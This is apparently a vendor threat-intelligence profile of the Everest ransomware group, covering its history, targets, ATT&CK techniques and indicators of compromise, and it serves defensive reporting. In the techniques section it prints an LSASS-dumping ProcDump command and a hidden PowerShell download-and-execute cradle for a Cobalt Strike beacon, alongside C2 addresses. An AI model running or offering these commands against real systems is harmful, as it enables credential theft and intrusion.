THREAT ACTOR

Everest

7
THREAT LEVEL
EMERGENCE DATE
Dec 2020
CATEGORY
Closed Group
AFFILIATIONS

Code-level connection to BlackByte ransomware family (medium-high confidence); operational collaboration with Ransomed ransomware group documented September 2023; member of EverBe 2.0 ransomware family lineage.

DEscription

Emerging in December 2020, this Russian-speaking operation evolved from data exfiltration to full ransomware with dual AES/DES encryption by early 2021. Distinguishing features include hybrid ransomware + Initial Access Broker services since November 2021 and corporate insider recruitment offering cash/profit-sharing since October 2023. Code connections to BlackByte ransomware family.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group with Initial Access Broker services and corporate insider recruitment operations

Everest operates a hybrid model combining direct ransomware with network access brokerage. IAB activities emerged November 2021, selling compromised credentials to other threat actors. The October 2023 insider recruitment program offers cash payments and profit-sharing for remote access. Binary analysis reveals code connections to BlackByte ransomware family's C# variant with local encryption key generation. Historical links to EverBe 2.0 ransomware family.

Current Status: Active as of October 2025, targeting critical infrastructure including national electricity transmission operators, aviation systems affecting multiple European airports, and telecommunications networks.

Threat Level:
7

Origins and Methodology

Everest maintains five years of operations through its hybrid model: ransomware + IAB services since November 2021 + insider recruitment since October 2023. Three distinct revenue streams. In April 2025, the group's dark web leak site was defaced with the message "Don't do crime CRIME IS BAD xoxo from Prague," possibly by rival group DragonForce, though attribution remains speculative. Operations recovered by mid-2025.

Technical operations rely on weaponizing specific legitimate tools: Cobalt Strike, ProcDump, SoftPerfect Network Scanner, WinRAR, AnyDesk, Splashtop, Atera. Defining characteristic: systematic deletion of all tools after each execution stage. BlackByte code connection manifests in local encryption key generation rather than server-based distribution.

What is the Evolution of Everest Ransomware?
0.1
Formation

Initial emergence December 2020 focused on data exfiltration without encryption, primarily targeting Canadian organizations. Early operations established reconnaissance methodologies, credential harvesting using ProcDump against LSASS, and WinRAR-based data archiving.

Transition to full ransomware occurred in early 2021 with dual AES/DES encryption and double extortion. Russia-based attribution from Russian-language operations and targeting patterns avoiding post-Soviet states.

0.2
EVOLUTION

Initial months concentrated on data exfiltration capabilities and dark web leak site infrastructure. May 2021 voluntary leak site takedown during broader ransomware law enforcement crackdown represented operational security adjustment. Operations resumed mid-2021 with reduced profile.

November 2021 pivot to IAB services marked business model evolution, with substantial uptick from November 2022. Revenue diversification through network access sales. October 2023 insider recruitment program launched on dark web forums, offering cash/profit-sharing for employee-provided access to US, Canada, Europe organizations.  

Current operations since 2024 show shift toward data-only extortion without encryption.

September 2025 critical infrastructure attacks: Everest claimed on their leak site in October to have compromised aviation systems at Heathrow, Brussels, and Berlin airports. The group also claimed October 2025 attacks on a European national electricity grid and telecommunications networks. These claims remain unverified by independent sources as of October 2025.

0.3
Lineage/Connections

Code analysis reveals relationship to BlackByte ransomware family's C# variant. Key architectural feature: local encryption key generation on compromised hosts rather than downloading from C2 servers.

Early file extension patterns.[everest@airmail.cc].EVEREST connect to EverBe 2.0 ransomware family (Embrace, PainLocker, EvilLocker, Hyena Locker variants). Joint victim announcement with Ransomed ransomware group September 2023.

Which Unique Techniques Does Everest Use?

Attack chains begin with three primary initial access methods specific to this group's operations: exploiting exposed RDP services, purchasing credentials from other Initial Access Brokers, or leveraging the corporate insider recruitment program active since October 2023. No specific CVE exploitation observed. Target selection shows particular concentration on US healthcare entities, especially medical imaging providers subjected to 24-hour negotiation deadlines.

TECHNIQUE

DETAILS

Infection Vectors

Internet-exposed RDP without MFA; vulnerable VPN endpoints; credentials purchased from Initial Access Brokers; corporate insider recruitment with cash payments since October 2023; phishing; unpatched public-facing applications

Target Selection

United States (over one-third of victims), Europe, emerging Middle East; healthcare disproportionately targeted (over one-quarter of US victims); financial services, legal services, construction, government, manufacturing, aviation; organizations with HIPAA and GDPR protected data

Operational Complexity

Specific toolkit: Cobalt Strike, ProcDump, SoftPerfect Network Scanner, WinRAR, AnyDesk, Splashtop, Atera; complete tool deletion after each stage; local key generation from BlackByte lineage; three remote access tools as Windows services

Key Features & Technical Details

Windows-focused C# ransomware with dual encryption algorithms and local key generation. No public decryption tools available.

FEATURE

DETAILS

Encryption Method

Dual algorithm implementation combining AES (Advanced Encryption Standard) and DES (Data Encryption Standard) with local key generation on compromised hosts ensuring encryption capability independent of C2 connectivity; keys not transmitted to external servers during encryption process complicating recovery efforts

File Extension

.EVEREST or .everest appended to encrypted files; historical variants used longer extensions including .[everest@airmail.cc].EVEREST connecting to EverBe 2.0 family lineage

Ransom Note

EVEREST LOCKER .txt delivered as primary ransom note in English; some variants deploy files with Chinese Unicode names; displayed via pop-up windows or text files appearing on desktops and in folders containing encrypted files; 24-hour negotiation deadlines particularly for healthcare targets exploiting operational urgency

Double Extortion

Pre-encryption data exfiltration using WinRAR archiving and Splashtop file transfer capabilities; dark web leak site infrastructure for victim naming and stolen data publication with countdown timers; staged data releases including proof samples, partial leaks, and full dumps; increasing shift toward data-only extortion without encryption threatening publication or sale while avoiding ransomware deployment complexity

Communication Channels

Cobalt Strike beacons over HTTPS on ports 8080 and 10443 for primary C2 communications; secondary channels through installed remote access tools including AnyDesk, Splashtop, and Atera; dark web leak site accessible via TOR network for victim negotiations and data publication; direct negotiation channels provided in ransom notes

Deployment Speed

Multi-stage attack execution spanning reconnaissance, credential harvesting, lateral movement, and data exfiltration before encryption deployment; typical dwell time ranges from days to weeks enabling comprehensive network mapping and high-value data identification; 24-hour negotiation deadlines following encryption particularly targeting healthcare sector operational urgency

Payment Method

Cryptocurrency with preference for Monero (XMR) over Bitcoin (BTC) due to enhanced privacy features; reportedly charges premium for Bitcoin payments to compensate for increased traceability risk; wallet addresses rotate per incident and provided directly to victims through negotiation channels

Operational Model

Closed group with multi-stream revenue including ransom payments for decryption, data non-disclosure extortion, direct data sales on dark web markets (documented prices ranging from tens of thousands to hundreds of thousands in cryptocurrency), network access brokerage to other ransomware operators and threat actors since November 2021, corporate insider recruitment with profit-sharing arrangements since October 2023

Activities

Sustained tempo through five years. Claimed September 2025 aviation system attacks at Heathrow/Brussels/Berlin airports. October 2025 saw continued escalation with claimed attacks against Swedish national power grid and telecommunications networks. United States represents over one-third of victims. Europe and the emerging Middle East represent additional hotspots (UAE, Saudi Arabia, Gulf states).

Which Industries Are Most Vulnerable to Everest?

Healthcare is targeted, representing over one-quarter of US victims. The group specifically targets medical imaging providers with 24-hour deadlines exploiting patient care urgency and HIPAA pressures.  Additional sectors: financial services, legal and professional services, construction, government and public sector, manufacturing, technology, retail, aviation and aerospace, energy and utilities.

HAL Most Recent Attacks

Modus Operandi

Multi-stage attack chains begin with opportunistic initial access followed by reconnaissance, credential harvesting, lateral movement, data exfiltration, and selective encryption deployment or data-only extortion.

Details

External Remote Services (T1133) targeting internet-exposed RDP without MFA and vulnerable VPN endpoints. No specific CVE exploitation.

Valid Accounts (T1078) via three methods: credentials purchased from other IABs (active since November 2021), credential stuffing, and corporate insider recruitment (October 2023) offering cash/profit-sharing for direct network access to US, Canada, Europe organizations.

Details

Network Service Discovery (T1046) using netscan.exe, netscanpack.exe, and SoftPerfect Network Scanner to enumerate topology, identify domain controllers/file servers, scan ports, discover shares, and retrieve device information via WMI, SNMP, HTTP, SSH, PowerShell.

Output consistently saved as subnets.txt and trustdumps.txt in C:\Users\Public\Downloads\ before deletion.

Details

Remote Access Software (T1219) consistently installing three tools across all operations: AnyDesk, Splashtop, Atera as Windows services. Triple-redundancy ensures persistence via service autostart and provides backup C2 independent of Cobalt Strike.

Details

Indicator Removal (T1070.004) defines operations: systematic removal of all tools after each execution stage.

SoftPerfect Network Scanner deleted after reconnaissance, subnets.txt/trustdumps.txt after processing, WinRAR archives after exfiltration, ProcDump and LSASS dumps after credential extraction. Stage-by-stage cleanup distinguishes from groups leaving artifacts throughout attack chains.

Details

OS Credential Dumping: LSASS Memory (T1003.001) using ProcDump with consistent command: C:\Users<user>\Desktop\procdump64.exe -ma lsass.exe C:\Users<user>\Desktop\lsass<domain>.dmp. Dumps saved to user desktops with domain-specific naming, extracting passwords, NTLM hashes, Kerberos tickets.

OS Credential Dumping: NTDS (T1003.003) copying NTDS.dit Active Directory database, consistently packaged as ntds.dit.zip for offline extraction.

Details

Application Layer Protocol (T1071.001) with Cobalt Strike over HTTPS on ports 8080 (beacon hosting) and 10443 (C2). Beacon deployment via PowerShell: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('<IP Address>/a')). Historical infrastructure: AWS EC2 3.22.79.23, 18.193.71.144, plus European 45.84.0.164.

Remote Access Software (T1219) providing backup C2 via AnyDesk, Splashtop, Atera.

Details

Remote Services utilizing Remote Desktop Protocol (T1021.001) with compromised legitimate user accounts for network traversal. RDP lateral movement exploits inadequate network segmentation and excessive user privileges.

Details

Exfiltration Over C2 Channel (T1041) using Splashtop file transfer specifically (not other remote access tools). WinRAR archives data before Splashtop transfer. Pre-encryption exfiltration enables data-only extortion. Documented targets: medical records (healthcare), customer data (financial services), legal documents (law firms), intellectual property (manufacturing).

Details

Create or Modify System Process targeting Windows Service (T1543.003) installing remote desktop software tools including AnyDesk, Splashtop Remote Desktop, and Atera as Windows services. Service-based persistence ensures automatic startup across system reboots and survives intermediate remediation efforts.

Details

Data encryption disrupts operations requiring restoration. Healthcare faces elevated impact: patient care interruption, appointment cancellations, medical device unavailability, and patient safety risks. Data exfiltration creates regulatory consequences: HIPAA penalties (healthcare), GDPR enforcement (Europe), notification requirements, litigation.

Financial impact beyond ransoms: restoration costs, business interruption, regulatory penalties, legal expenses, insurance premium increases. Downtime: days to weeks depending on backups.

Details

Data Encrypted for Impact (T1486) deploying dual AES/DES with .EVEREST or .everest extension. Defining characteristic from BlackByte lineage: local key generation on each host (not downloaded from C2 servers), ensuring encryption survives infrastructure disruption. Ransom note: EVEREST LOCKER .txt. Operational shift since 2024 toward data-only extortion without encryption.

Details

Double extortion: encryption + pre-exfiltration data theft threatening dark web publication. Pressure mechanisms: staged releases (proof samples → partial → full), countdown timers, regulatory agency threats.

Healthcare-specific tactic: 24-hour deadlines for healthcare targets (documented across medical imaging attacks) exploiting patient care dependencies and HIPAA penalties. This compressed timeline distinguishes healthcare from other sectors. Recent operations: password-protected dark web postings.

Details

Stage-by-stage deletion distinguishes operations. After reconnaissance: netscan.exe, netscanpack.exe, SoftPerfect Network Scanner removed. After processing: subnets.txt, trustdumps.txt deleted from C:\Users\Public\Downloads. After exfiltration: WinRAR archives removed. After credential harvesting: ProcDump, LSASS dumps deleted from user desktops. Cleanup occurs after each stage, not at attack conclusion.

Indicators of Compromise (IOCs)

Network and host-based indicators enable detection across compromised environments.

INDICATOR

DETAILS

File Hashes

SHA256: f6ed1ce91192dc068151025cd1ca8efd3ba68d035c92a540bf693aa2e217df0e (primary ransomware payload, 39,936 bytes, PE32 executable, UPX compression)
MD5: 88c7bbbd73caa66b7d6d1056cf5204dc (primary payload)
SHA1: f765e0b79ec2c0b0639631403fd9c1472898ac48 (primary payload)

IP Addresses

3.22.79.23 (Cobalt Strike beacon hosting on port 8080, C2 communications on port 10443)
18.193.71.144 (Cobalt Strike C2 on port 10443)
45.84.0.164 (Meterpreter C2 on port 10443)

Domains/URLs

hxxp://3.22.79[.]23:8080/ (Cobalt Strike beacon hosting)
hxxp://3.22.79[.]23:8080/a (Cobalt Strike beacon endpoint)
hxxp://3.22.79[.]23:10443/ga.js (Cobalt Strike C2 communication)
hxxp://18.193.71[.]144:10443/match (Cobalt Strike C2 communication)
hxxp://45.84.0[.]164:10443/o6mJ (Meterpreter C2 endpoint)

File Paths

C:\Users\<user>\Desktop\procdump64.exe or C:\Users\<user>\Desktop\procdump.exe (LSASS credential dumping)
C:\Users\<user>\Desktop\lsass<domain>.dmp or C:\Users\<user>\Desktop\lsass.dmp (LSASS memory dumps)
C:\Users\Public\Downloads\subnets.txt (network reconnaissance output)
C:\Users\Public\Downloads\trustdumps.txt (Active Directory trust enumeration output)
C:\Users\Public\l.exe (Metasploit payload)
Windows service installations at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ for AnyDesk, Splashtop, Atera

File Extensions

.EVEREST or .everest (primary encrypted file extension)
.[everest@airmail.cc].EVEREST (historical variant)
EVEREST LOCKER .txt (ransom note filename)
ntds.dit.zip (archived Active Directory database)

Exploits and Vulnerabilities

No specific CVE exploitation. Initial access relies on common misconfigurations.

Additional Attack Vectors:

Exposed Remote Services: Internet-exposed RDP, VPN without MFA via T1133.

Weak Authentication: Inadequate passwords, missing MFA via T1078.

Unpatched Applications: Outdated internet-facing software via T1190.

Purchased Access: Compromised credentials from dark web.

Corporate Insiders: Cash/profit-sharing recruitment since October 2023.